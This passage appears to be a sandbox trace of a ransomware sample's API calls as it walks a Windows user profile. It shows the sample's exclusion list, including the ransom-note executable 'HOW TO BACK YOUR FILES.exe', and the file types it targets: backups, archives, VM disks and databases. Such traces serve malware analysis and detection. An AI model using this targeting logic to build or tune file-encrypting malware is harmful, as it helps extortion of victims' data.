lstrcmpiW (lpString1="Cookies", lpString2="ntuser.dat") returned -1 [0057.503] lstrcmpiW (lpString1="Cookies", lpString2="perflogs") returned -1 [0057.503] lstrcmpiW (lpString1="Cookies", lpString2="MSBuild") returned -1 [0057.503] lstrlenW (lpString="Cookies") returned 7 [0057.503] lstrlenW (lpString="C:\\Users\\Default User\\Contacts") returned 30 [0057.503] lstrcpyW (in: lpString1=0x2cce42c, lpString2="Cookies" | out: lpString1="Cookies") returned="Cookies" [0057.503] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7bc8 [0057.503] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x3c) returned 0x2e6288 [0057.503] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7bd0 | out: ListHead=0x2e7710, ListEntry=0x2e7bd0) returned 0x2e7bf0 [0057.503] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfda4e0ba, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x4b1619e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4b1619e0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Desktop", cAlternateFileName="")) returned 1 [0057.503] lstrcmpiW (lpString1="Desktop", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0057.503] lstrcmpiW (lpString1="Desktop", lpString2="aoldtz.exe") returned 1 [0057.503] lstrcmpiW (lpString1="Desktop", lpString2=".") returned 1 [0057.503] lstrcmpiW (lpString1="Desktop", lpString2="..") returned 1 [0057.503] lstrcmpiW (lpString1="Desktop", lpString2="windows") returned -1 [0057.503] lstrcmpiW (lpString1="Desktop", lpString2="bootmgr") returned 1 [0057.503] lstrcmpiW (lpString1="Desktop", lpString2="temp") returned -1 [0057.503] lstrcmpiW (lpString1="Desktop", lpString2="pagefile.sys") returned -1 [0057.503] lstrcmpiW (lpString1="Desktop", lpString2="boot") returned 1 [0057.503] lstrcmpiW (lpString1="Desktop", lpString2="ids.txt") returned -1 [0057.503] lstrcmpiW (lpString1="Desktop", lpString2="ntuser.dat") returned -1 [0057.503] lstrcmpiW (lpString1="Desktop", lpString2="perflogs") returned -1 [0057.503] lstrcmpiW (lpString1="Desktop", lpString2="MSBuild") returned -1 [0057.503] lstrlenW (lpString="Desktop") returned 7 [0057.503] lstrlenW (lpString="C:\\Users\\Default User\\Cookies") returned 29 [0057.503] lstrcpyW (in: lpString1=0x2cce42c, lpString2="Desktop" | out: lpString1="Desktop") returned="Desktop" [0057.503] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7aa8 [0057.503] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x3c) returned 0x2e62d0 [0057.503] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7ab0 | out: ListHead=0x2e7710, ListEntry=0x2e7ab0) returned 0x2e7bd0 [0057.503] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfda9a36e, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x49eeef60, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x49eeef60, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Documents", cAlternateFileName="DOCUME~1")) returned 1 [0057.503] lstrcmpiW (lpString1="Documents", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0057.503] lstrcmpiW (lpString1="Documents", lpString2="aoldtz.exe") returned 1 [0057.503] lstrcmpiW (lpString1="Documents", lpString2=".") returned 1 [0057.504] lstrcmpiW (lpString1="Documents", lpString2="..") returned 1 [0057.504] lstrcmpiW (lpString1="Documents", lpString2="windows") returned -1 [0057.504] lstrcmpiW (lpString1="Documents", lpString2="bootmgr") returned 1 [0057.504] lstrcmpiW (lpString1="Documents", lpString2="temp") returned -1 [0057.504] lstrcmpiW (lpString1="Documents", lpString2="pagefile.sys") returned -1 [0057.504] lstrcmpiW (lpString1="Documents", lpString2="boot") returned 1 [0057.504] lstrcmpiW (lpString1="Documents", lpString2="ids.txt") returned -1 [0057.504] lstrcmpiW (lpString1="Documents", lpString2="ntuser.dat") returned -1 [0057.504] lstrcmpiW (lpString1="Documents", lpString2="perflogs") returned -1 [0057.504] lstrcmpiW (lpString1="Documents", lpString2="MSBuild") returned -1 [0057.504] lstrlenW (lpString="Documents") returned 9 [0057.504] lstrlenW (lpString="C:\\Users\\Default User\\Desktop") returned 29 [0057.504] lstrcpyW (in: lpString1=0x2cce42c, lpString2="Documents" | out: lpString1="Documents") returned="Documents" [0057.504] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7ac8 [0057.504] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x40) returned 0x2e6318 [0057.504] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7ad0 | out: ListHead=0x2e7710, ListEntry=0x2e7ad0) returned 0x2e7ab0 [0057.504] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfda9a36e, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x4b1619e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4b1619e0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Downloads", cAlternateFileName="DOWNLO~1")) returned 1 [0057.504] lstrcmpiW (lpString1="Downloads", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0057.504] lstrcmpiW (lpString1="Downloads", lpString2="aoldtz.exe") returned 1 [0057.504] lstrcmpiW (lpString1="Downloads", lpString2=".") returned 1 [0057.504] lstrcmpiW (lpString1="Downloads", lpString2="..") returned 1 [0057.504] lstrcmpiW (lpString1="Downloads", lpString2="windows") returned -1 [0057.504] lstrcmpiW (lpString1="Downloads", lpString2="bootmgr") returned 1 [0057.504] lstrcmpiW (lpString1="Downloads", lpString2="temp") returned -1 [0057.504] lstrcmpiW (lpString1="Downloads", lpString2="pagefile.sys") returned -1 [0057.504] lstrcmpiW (lpString1="Downloads", lpString2="boot") returned 1 [0057.504] lstrcmpiW (lpString1="Downloads", lpString2="ids.txt") returned -1 [0057.504] lstrcmpiW (lpString1="Downloads", lpString2="ntuser.dat") returned -1 [0057.504] lstrcmpiW (lpString1="Downloads", lpString2="perflogs") returned -1 [0057.504] lstrcmpiW (lpString1="Downloads", lpString2="MSBuild") returned -1 [0057.504] lstrlenW (lpString="Downloads") returned 9 [0057.504] lstrlenW (lpString="C:\\Users\\Default User\\Documents") returned 31 [0057.504] lstrcpyW (in: lpString1=0x2cce42c, lpString2="Downloads" | out: lpString1="Downloads") returned="Downloads" [0057.504] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7ae8 [0057.504] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x40) returned 0x2e6360 [0057.504] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7af0 | out: ListHead=0x2e7710, ListEntry=0x2e7af0) returned 0x2e7ad0 [0057.504] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfda9a36e, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x4b115720, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4b115720, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Favorites", cAlternateFileName="FAVORI~1")) returned 1 [0057.504] lstrcmpiW (lpString1="Favorites", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0057.505] lstrcmpiW (lpString1="Favorites", lpString2="aoldtz.exe") returned 1 [0057.505] lstrcmpiW (lpString1="Favorites", lpString2=".") returned 1 [0057.505] lstrcmpiW (lpString1="Favorites", lpString2="..") returned 1 [0057.505] lstrcmpiW (lpString1="Favorites", lpString2="windows") returned -1 [0057.505] lstrcmpiW (lpString1="Favorites", lpString2="bootmgr") returned 1 [0057.505] lstrcmpiW (lpString1="Favorites", lpString2="temp") returned -1 [0057.505] lstrcmpiW (lpString1="Favorites", lpString2="pagefile.sys") returned -1 [0057.505] lstrcmpiW (lpString1="Favorites", lpString2="boot") returned 1 [0057.505] lstrcmpiW (lpString1="Favorites", lpString2="ids.txt") returned -1 [0057.505] lstrcmpiW (lpString1="Favorites", lpString2="ntuser.dat") returned -1 [0057.505] lstrcmpiW (lpString1="Favorites", lpString2="perflogs") returned -1 [0057.505] lstrcmpiW (lpString1="Favorites", lpString2="MSBuild") returned -1 [0057.505] lstrlenW (lpString="Favorites") returned 9 [0057.505] lstrlenW (lpString="C:\\Users\\Default User\\Downloads") returned 31 [0057.505] lstrcpyW (in: lpString1=0x2cce42c, lpString2="Favorites" | out: lpString1="Favorites") returned="Favorites" [0057.505] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7b08 [0057.505] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x40) returned 0x2e63a8 [0057.505] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7b10 | out: ListHead=0x2e7710, ListEntry=0x2e7b10) returned 0x2e7af0 [0057.505] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x49aeaa40, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x49aeaa40, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0057.505] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0057.505] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfda9a36e, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x4b115720, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4b115720, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Links", cAlternateFileName="")) returned 1 [0057.505] lstrcmpiW (lpString1="Links", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0057.505] lstrcmpiW (lpString1="Links", lpString2="aoldtz.exe") returned 1 [0057.505] lstrcmpiW (lpString1="Links", lpString2=".") returned 1 [0057.505] lstrcmpiW (lpString1="Links", lpString2="..") returned 1 [0057.505] lstrcmpiW (lpString1="Links", lpString2="windows") returned -1 [0057.505] lstrcmpiW (lpString1="Links", lpString2="bootmgr") returned 1 [0057.505] lstrcmpiW (lpString1="Links", lpString2="temp") returned -1 [0057.505] lstrcmpiW (lpString1="Links", lpString2="pagefile.sys") returned -1 [0057.505] lstrcmpiW (lpString1="Links", lpString2="boot") returned 1 [0057.505] lstrcmpiW (lpString1="Links", lpString2="ids.txt") returned 1 [0057.505] lstrcmpiW (lpString1="Links", lpString2="ntuser.dat") returned -1 [0057.505] lstrcmpiW (lpString1="Links", lpString2="perflogs") returned -1 [0057.505] lstrcmpiW (lpString1="Links", lpString2="MSBuild") returned -1 [0057.505] lstrlenW (lpString="Links") returned 5 [0057.505] lstrlenW (lpString="C:\\Users\\Default User\\Favorites") returned 31 [0057.505] lstrcpyW (in: lpString1=0x2cce42c, lpString2="Links" | out: lpString1="Links") returned="Links" [0057.506] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7b28 [0057.506] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x38) returned 0x2cce28 [0057.506] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7b30 | out: ListHead=0x2e7710, ListEntry=0x2e7b30) returned 0x2e7b10 [0057.506] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x30702f92, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x30702f92, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x30702f92, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Local Settings", cAlternateFileName="LOCALS~1")) returned 1 [0057.506] lstrcmpiW (lpString1="Local Settings", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0057.506] lstrcmpiW (lpString1="Local Settings", lpString2="aoldtz.exe") returned 1 [0057.506] lstrcmpiW (lpString1="Local Settings", lpString2=".") returned 1 [0057.506] lstrcmpiW (lpString1="Local Settings", lpString2="..") returned 1 [0057.506] lstrcmpiW (lpString1="Local Settings", lpString2="windows") returned -1 [0057.506] lstrcmpiW (lpString1="Local Settings", lpString2="bootmgr") returned 1 [0057.506] lstrcmpiW (lpString1="Local Settings", lpString2="temp") returned -1 [0057.506] lstrcmpiW (lpString1="Local Settings", lpString2="pagefile.sys") returned -1 [0057.506] lstrcmpiW (lpString1="Local Settings", lpString2="boot") returned 1 [0057.506] lstrcmpiW (lpString1="Local Settings", lpString2="ids.txt") returned 1 [0057.506] lstrcmpiW (lpString1="Local Settings", lpString2="ntuser.dat") returned -1 [0057.506] lstrcmpiW (lpString1="Local Settings", lpString2="perflogs") returned -1 [0057.506] lstrcmpiW (lpString1="Local Settings", lpString2="MSBuild") returned -1 [0057.506] lstrlenW (lpString="Local Settings") returned 14 [0057.506] lstrlenW (lpString="C:\\Users\\Default User\\Links") returned 27 [0057.506] lstrcpyW (in: lpString1=0x2cce42c, lpString2="Local Settings" | out: lpString1="Local Settings") returned="Local Settings" [0057.506] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7b48 [0057.506] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x4a) returned 0x2ed8f8 [0057.506] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7b50 | out: ListHead=0x2e7710, ListEntry=0x2e7b50) returned 0x2e7b30 [0057.506] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfda9a36e, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x49f3b220, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x49f3b220, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Music", cAlternateFileName="")) returned 1 [0057.506] lstrcmpiW (lpString1="Music", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0057.506] lstrcmpiW (lpString1="Music", lpString2="aoldtz.exe") returned 1 [0057.506] lstrcmpiW (lpString1="Music", lpString2=".") returned 1 [0057.506] lstrcmpiW (lpString1="Music", lpString2="..") returned 1 [0057.506] lstrcmpiW (lpString1="Music", lpString2="windows") returned -1 [0057.506] lstrcmpiW (lpString1="Music", lpString2="bootmgr") returned 1 [0057.506] lstrcmpiW (lpString1="Music", lpString2="temp") returned -1 [0057.506] lstrcmpiW (lpString1="Music", lpString2="pagefile.sys") returned -1 [0057.506] lstrcmpiW (lpString1="Music", lpString2="boot") returned 1 [0057.506] lstrcmpiW (lpString1="Music", lpString2="ids.txt") returned 1 [0057.506] lstrcmpiW (lpString1="Music", lpString2="ntuser.dat") returned -1 [0057.507] lstrcmpiW (lpString1="Music", lpString2="perflogs") returned -1 [0057.507] lstrcmpiW (lpString1="Music", lpString2="MSBuild") returned 1 [0057.507] lstrlenW (lpString="Music") returned 5 [0057.507] lstrlenW (lpString="C:\\Users\\Default User\\Local Settings") returned 36 [0057.507] lstrcpyW (in: lpString1=0x2cce42c, lpString2="Music" | out: lpString1="Music") returned="Music" [0057.507] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7b68 [0057.507] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x38) returned 0x2cd068 [0057.507] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7b70 | out: ListHead=0x2e7710, ListEntry=0x2e7b70) returned 0x2e7b50 [0057.507] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x306b6cd1, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x306b6cd1, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x306b6cd1, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Documents", cAlternateFileName="MYDOCU~1")) returned 1 [0057.507] lstrcmpiW (lpString1="My Documents", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0057.507] lstrcmpiW (lpString1="My Documents", lpString2="aoldtz.exe") returned 1 [0057.507] lstrcmpiW (lpString1="My Documents", lpString2=".") returned 1 [0057.507] lstrcmpiW (lpString1="My Documents", lpString2="..") returned 1 [0057.507] lstrcmpiW (lpString1="My Documents", lpString2="windows") returned -1 [0057.507] lstrcmpiW (lpString1="My Documents", lpString2="bootmgr") returned 1 [0057.507] lstrcmpiW (lpString1="My Documents", lpString2="temp") returned -1 [0057.507] lstrcmpiW (lpString1="My Documents", lpString2="pagefile.sys") returned -1 [0057.507] lstrcmpiW (lpString1="My Documents", lpString2="boot") returned 1 [0057.507] lstrcmpiW (lpString1="My Documents", lpString2="ids.txt") returned 1 [0057.507] lstrcmpiW (lpString1="My Documents", lpString2="ntuser.dat") returned -1 [0057.507] lstrcmpiW (lpString1="My Documents", lpString2="perflogs") returned -1 [0057.507] lstrcmpiW (lpString1="My Documents", lpString2="MSBuild") returned 1 [0057.507] lstrlenW (lpString="My Documents") returned 12 [0057.507] lstrlenW (lpString="C:\\Users\\Default User\\Music") returned 27 [0057.507] lstrcpyW (in: lpString1=0x2cce42c, lpString2="My Documents" | out: lpString1="My Documents") returned="My Documents" [0057.507] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7b88 [0057.507] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x46) returned 0x2ee970 [0057.507] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7b90 | out: ListHead=0x2e7710, ListEntry=0x2e7b90) returned 0x2e7b70 [0057.507] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x306dce32, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x306dce32, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x306dce32, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NetHood", cAlternateFileName="")) returned 1 [0057.507] lstrcmpiW (lpString1="NetHood", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0057.507] lstrcmpiW (lpString1="NetHood", lpString2="aoldtz.exe") returned 1 [0057.507] lstrcmpiW (lpString1="NetHood", lpString2=".") returned 1 [0057.507] lstrcmpiW (lpString1="NetHood", lpString2="..") returned 1 [0057.507] lstrcmpiW (lpString1="NetHood", lpString2="windows") returned -1 [0057.507] lstrcmpiW (lpString1="NetHood", lpString2="bootmgr") returned 1 [0057.507] lstrcmpiW (lpString1="NetHood", lpString2="temp") returned -1 [0057.507] lstrcmpiW (lpString1="NetHood", lpString2="pagefile.sys") returned -1 [0057.508] lstrcmpiW (lpString1="NetHood", lpString2="boot") returned 1 [0057.508] lstrcmpiW (lpString1="NetHood", lpString2="ids.txt") returned 1 [0057.508] lstrcmpiW (lpString1="NetHood", lpString2="ntuser.dat") returned -1 [0057.508] lstrcmpiW (lpString1="NetHood", lpString2="perflogs") returned -1 [0057.508] lstrcmpiW (lpString1="NetHood", lpString2="MSBuild") returned 1 [0057.508] lstrlenW (lpString="NetHood") returned 7 [0057.508] lstrlenW (lpString="C:\\Users\\Default User\\My Documents") returned 34 [0057.508] lstrcpyW (in: lpString1=0x2cce42c, lpString2="NetHood" | out: lpString1="NetHood") returned="NetHood" [0057.508] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7ca8 [0057.508] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x3c) returned 0x2e63f0 [0057.508] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7cb0 | out: ListHead=0x2e7710, ListEntry=0x2e7cb0) returned 0x2e7b90 [0057.508] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x9012aa61, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0x6770de0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x6770de0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0xc0000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NTUSER.DAT", cAlternateFileName="")) returned 1 [0057.508] lstrcmpiW (lpString1="NTUSER.DAT", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0057.508] lstrcmpiW (lpString1="NTUSER.DAT", lpString2="aoldtz.exe") returned 1 [0057.508] lstrcmpiW (lpString1="NTUSER.DAT", lpString2=".") returned 1 [0057.508] lstrcmpiW (lpString1="NTUSER.DAT", lpString2="..") returned 1 [0057.508] lstrcmpiW (lpString1="NTUSER.DAT", lpString2="windows") returned -1 [0057.508] lstrcmpiW (lpString1="NTUSER.DAT", lpString2="bootmgr") returned 1 [0057.508] lstrcmpiW (lpString1="NTUSER.DAT", lpString2="temp") returned -1 [0057.508] lstrcmpiW (lpString1="NTUSER.DAT", lpString2="pagefile.sys") returned -1 [0057.508] lstrcmpiW (lpString1="NTUSER.DAT", lpString2="boot") returned 1 [0057.508] lstrcmpiW (lpString1="NTUSER.DAT", lpString2="ids.txt") returned 1 [0057.508] lstrcmpiW (lpString1="NTUSER.DAT", lpString2="ntuser.dat") returned 0 [0057.508] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x22, ftCreationTime.dwLowDateTime=0xc103692e, ftCreationTime.dwHighDateTime=0x1ca0451, ftLastAccessTime.dwLowDateTime=0x1dd1880d, ftLastAccessTime.dwHighDateTime=0x1cbf8ec, ftLastWriteTime.dwLowDateTime=0x1dd1880d, ftLastWriteTime.dwHighDateTime=0x1cbf8ec, nFileSizeHigh=0x0, nFileSizeLow=0x400, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NTUSER.DAT.LOG", cAlternateFileName="NTUSER~3.LOG")) returned 1 [0057.508] lstrcmpiW (lpString1="NTUSER.DAT.LOG", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0057.508] lstrcmpiW (lpString1="NTUSER.DAT.LOG", lpString2="aoldtz.exe") returned 1 [0057.508] lstrcmpiW (lpString1="NTUSER.DAT.LOG", lpString2=".") returned 1 [0057.508] lstrcmpiW (lpString1="NTUSER.DAT.LOG", lpString2="..") returned 1 [0057.508] lstrcmpiW (lpString1="NTUSER.DAT.LOG", lpString2="windows") returned -1 [0057.508] lstrcmpiW (lpString1="NTUSER.DAT.LOG", lpString2="bootmgr") returned 1 [0057.508] lstrcmpiW (lpString1="NTUSER.DAT.LOG", lpString2="temp") returned -1 [0057.508] lstrcmpiW (lpString1="NTUSER.DAT.LOG", lpString2="pagefile.sys") returned -1 [0057.508] lstrcmpiW (lpString1="NTUSER.DAT.LOG", lpString2="boot") returned 1 [0057.508] lstrcmpiW (lpString1="NTUSER.DAT.LOG", lpString2="ids.txt") returned 1 [0057.508] lstrcmpiW (lpString1="NTUSER.DAT.LOG", lpString2="ntuser.dat") returned 1 [0057.508] lstrcmpiW (lpString1="NTUSER.DAT.LOG", lpString2="perflogs") returned -1 [0057.508] lstrcmpiW (lpString1="NTUSER.DAT.LOG", lpString2="MSBuild") returned 1 [0057.509] lstrlenW (lpString="NTUSER.DAT.LOG") returned 14 [0057.509] lstrlenW (lpString="C:\\Users\\Default User\\NetHood") returned 29 [0057.509] lstrcpyW (in: lpString1=0x2cce42c, lpString2="NTUSER.DAT.LOG" | out: lpString1="NTUSER.DAT.LOG") returned="NTUSER.DAT.LOG" [0057.509] lstrlenW (lpString="NTUSER.DAT.LOG") returned 14 [0057.509] lstrlenW (lpString="Ares865") returned 7 [0057.509] lstrcmpiW (lpString1="DAT.LOG", lpString2="Ares865") returned 1 [0057.509] lstrlenW (lpString=".dll") returned 4 [0057.509] lstrcmpiW (lpString1="NTUSER.DAT.LOG", lpString2=".dll") returned 1 [0057.509] lstrlenW (lpString=".lnk") returned 4 [0057.509] lstrcmpiW (lpString1="NTUSER.DAT.LOG", lpString2=".lnk") returned 1 [0057.509] lstrlenW (lpString=".ini") returned 4 [0057.509] lstrcmpiW (lpString1="NTUSER.DAT.LOG", lpString2=".ini") returned 1 [0057.509] lstrlenW (lpString=".sys") returned 4 [0057.509] lstrcmpiW (lpString1="NTUSER.DAT.LOG", lpString2=".sys") returned 1 [0057.509] lstrlenW (lpString="NTUSER.DAT.LOG") returned 14 [0057.509] lstrlenW (lpString="bak") returned 3 [0057.509] lstrcmpiW (lpString1="LOG", lpString2="bak") returned 1 [0057.509] lstrlenW (lpString="ba_") returned 3 [0057.509] lstrcmpiW (lpString1="LOG", lpString2="ba_") returned 1 [0057.509] lstrlenW (lpString="dbb") returned 3 [0057.509] lstrcmpiW (lpString1="LOG", lpString2="dbb") returned 1 [0057.509] lstrlenW (lpString="vmdk") returned 4 [0057.509] lstrcmpiW (lpString1=".LOG", lpString2="vmdk") returned -1 [0057.509] lstrlenW (lpString="rar") returned 3 [0057.509] lstrcmpiW (lpString1="LOG", lpString2="rar") returned -1 [0057.509] lstrlenW (lpString="zip") returned 3 [0057.509] lstrcmpiW (lpString1="LOG", lpString2="zip") returned -1 [0057.509] lstrlenW (lpString="tgz") returned 3 [0057.509] lstrcmpiW (lpString1="LOG", lpString2="tgz") returned -1 [0057.509] lstrlenW (lpString="vbox") returned 4 [0057.509] lstrcmpiW (lpString1=".LOG", lpString2="vbox") returned -1 [0057.509] lstrlenW (lpString="vdi") returned 3 [0057.509] lstrcmpiW (lpString1="LOG", lpString2="vdi") returned -1 [0057.509] lstrlenW (lpString="vhd") returned 3 [0057.509] lstrcmpiW (lpString1="LOG", lpString2="vhd") returned -1 [0057.509] lstrlenW (lpString="vhdx") returned 4 [0057.509] lstrcmpiW (lpString1=".LOG", lpString2="vhdx") returned -1 [0057.509] lstrlenW (lpString="avhd") returned 4 [0057.510] lstrcmpiW (lpString1=".LOG", lpString2="avhd") returned -1 [0057.510] lstrlenW (lpString="db") returned 2 [0057.510] lstrcmpiW (lpString1="OG", lpString2="db") returned 1 [0057.510] lstrlenW (lpString="db2") returned 3 [0057.510] lstrcmpiW (lpString1="LOG", lpString2="db2") returned 1 [0057.510] lstrlenW (lpString="db3") returned 3 [0057.510] lstrcmpiW (lpString1="LOG", lpString2="db3") returned 1 [0057.510] lstrlenW (lpString="dbf") returned 3 [0057.510] lstrcmpiW (lpString1="LOG", lpString2="dbf") returned 1 [0057.510] lstrlenW (lpString="mdf") returned 3 [0057.510] 